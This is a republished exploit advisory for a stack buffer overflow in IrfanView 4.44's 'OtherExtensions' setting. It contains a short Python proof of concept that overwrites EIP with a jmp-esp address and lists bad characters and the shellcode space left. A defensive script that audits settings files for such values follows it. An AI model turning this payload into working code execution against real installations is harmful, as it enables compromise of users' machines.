IrfanView 4.44 - Denial of Service
Source: vfocus.net  Author: Orprecio  Published: 2017-05-05
# Exploit Title: Irfanview - OtherExtensions Input Overflow
# Date: 29-04-2017
# Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button
# Exploit Author: Dreivan Orprecio
#Version: Irfanview 4.44
#Irfanview is vulnerable to overflow in "OtherExtensions" input field
#Debugging Machine: WinXP Pro SP3 (32bit)
 
 
#POC
 
#!/usr/bin/python

eip = "\xf7\x56\x44\x7e" #jmp esp from user32.dll

buffer = "OtherExtensions="+"A" * 199 + eip + "\xcc"

print buffer              #a) irfanview->Option->Properties/Settings->Extensions
                          #b) Paste the buffer in the "other" input then press ok, repeat a) and b)

#Bad characters: those instructions that start with 6,7,8,E,F
#Only 43 bytes space to host a shellcode and lots of badchars make it hard for this to exploit
#Any other way around this?
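
A defender-side check for the condition above, added here as an example and not part of the original PoC or of IrfanView: it audits settings text for `OtherExtensions=` values that are over-long or contain unexpected bytes. It assumes the value is persisted as a key=value line (as the PoC's prefix suggests); the policy limit, the allowed character set and the sample input are assumptions constructed for illustration.

```python
import re

# From the PoC on this page: 199 filler bytes precede the overwritten return address.
POC_OFFSET = 199
# Assumption: policy limit for a legitimate extension list, chosen well below POC_OFFSET.
POLICY_MAX = 128
# Assumption: a legitimate value holds printable extension names and simple separators.
ALLOWED = re.compile(rb"^[A-Za-z0-9|;,.* ]*$")
KEY = re.compile(rb"^\s*OtherExtensions\s*=(.*)$", re.IGNORECASE)


def audit_settings(data):
    """Return one finding per suspicious OtherExtensions line in raw settings bytes."""
    findings = []
    for lineno, line in enumerate(data.splitlines(), start=1):
        m = KEY.match(line)
        if not m:
            continue
        value = m.group(1).strip()
        reasons = []
        if len(value) > POLICY_MAX:
            reasons.append("length %d exceeds policy limit %d" % (len(value), POLICY_MAX))
        if len(value) >= POC_OFFSET:
            reasons.append("reaches the %d-byte offset from the PoC" % POC_OFFSET)
        if not ALLOWED.match(value):
            reasons.append("contains bytes outside the expected character set")
        if reasons:
            findings.append({"line": lineno, "length": len(value), "reasons": reasons})
    return findings


# Constructed sample input (not taken from a real installation).
SAMPLE = (
    b"; constructed sample\n"
    b"OtherExtensions=XYZ|ABC\n"
    b"OtherExtensions=" + b"B" * 150 + b"\n"
    b"OtherExtensions=" + b"C" * 199 + b"\x01\x02\x03\x04\n"
)

if __name__ == "__main__":
    for finding in audit_settings(SAMPLE):
        print(finding)
```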
 